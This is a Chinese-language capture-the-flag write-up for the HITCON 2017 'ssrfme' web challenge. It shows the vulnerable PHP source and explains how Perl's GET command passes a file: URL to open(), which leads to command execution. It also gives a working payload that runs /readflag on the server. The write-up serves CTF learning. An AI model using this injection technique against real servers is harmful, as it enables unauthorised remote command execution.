HITCON2017-web ssrfme
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["filename"]); $dir = str_replace(".", "", basename($info["dirname"])); @mkdir($dir); @chdir($dir); @file_put_contents(basename($info["basename"]), $data); highlight_file(__FILE__);
前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行,
命令执行的结果会被存入我们以filename参数的值命名的文件里
尝试读取根目录,并创建文件名为12的文件
用curl查看文件,发现flag文件和readflag。flag是不能直接查看的,需要执行readflag查看flag
知识点:perl脚本GET open命令漏洞
GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理
open存在命令执行,并且还支持file函数
构造payload:?url=file:bash -c /readflag|&filename=bash -c /readflag|
?url=file:bash -c /readflag|&filename=123
因为我们传入的是文件名,如果文件不存在是无法被执行的,所以我们用filename创建同名的文件,
之后再任意创建一个文件名,访问就可以了